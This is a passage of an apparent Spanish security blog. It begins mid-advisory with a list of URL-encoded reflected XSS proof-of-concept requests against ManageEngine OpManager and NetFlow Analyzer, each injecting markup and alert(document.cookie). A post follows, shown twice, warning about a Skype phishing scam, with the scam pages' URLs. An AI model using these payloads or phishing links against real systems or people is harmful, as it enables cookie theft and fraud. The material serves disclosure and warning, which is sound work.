0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa
me=com.adventnet.me.opmanager.webclient.admin.association.N
TServiceAssociation
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf
igurations
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6
F%64%79%3E
#######################
NetFlow Analizer
#######################
http://localhost:8080/netflow/jspui/applicationList.jsp?alph
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
%3C%2F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3
C%2F%62%6F%64%79%3E&appID=62
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%
3E%3C%2F%62%6F%64%79%3E&grDisp=1
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%
64%79%3E&period=hourly&customOption=true&firstTime=true
#################### €nd ################################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Skype Phishing and other pay methoth Scam
Sunday, June 17, 2007
################################################
Skype Phishing and other pay methoth Scam
###############################################
Hoy me llego un correo solicitandome que actualizara
La informacion de mi cuenta de skype (sistema que no uso)

Es una nueva forma de hacerse con las contraseñas de los
incautos usuarios;pero esto va un poco mas lejos.
Si por desgracia accedemos a la web malefica:
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/login.html

ademas de perder nuestra cuenta de skype tenemos mucho
mas que perder.pues la pagina malefica, ademas intentara
por medio de engaño hacerse con varias de nuestras
contraseñas o datos importantes de nuestras formas
de pago por internet.

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/c2.php
Nuestra cuenta de PayPal :

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/PayPal%20-%20Log%20In.htm
nuestra cuenta de MoneyBrookers

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/book1.htm

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/bookf.htm
asi como los posibles datos de nuestra targeta visa y/o mastercard.

aseguraos de que las direcciones que visitais son las autenticas
de los sitios de pago, si no,no introducir ningun dato en ellas y
aun siendo lejitimas , deberiais desconfiar igualmente.
################## €nd ###################################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Skype Phishing and other pay methoth Scam
###############################################
Hoy me llego un correo solicitandome que actualizara
La informacion de mi cuenta de skype (sistema que no uso)
Es una nueva forma de hacerse con las contraseñas de los
incautos usuarios;pero esto va un poco mas lejos.
Si por desgracia accedemos a la web malefica:
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/login.html
ademas de perder nuestra cuenta de skype tenemos mucho
mas que perder.pues la pagina malefica, ademas intentara
por medio de engaño hacerse con varias de nuestras
contraseñas o datos importantes de nuestras formas
de pago por internet.
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/c2.php
Nuestra cuenta de PayPal :
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/PayPal%20-%20Log%20In.htm
nuestra cuenta de MoneyBrookers
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/book1.htm
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/bookf.htm
asi como los posibles datos de nuestra targeta visa y/o mastercard.
aseguraos de que las direcciones que visitais son las autenticas
de los sitios de pago, si no,no introducir ningun dato en ellas y
aun siendo lejitimas , deberiais desconfiar igualmente.
################## €nd ###################################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)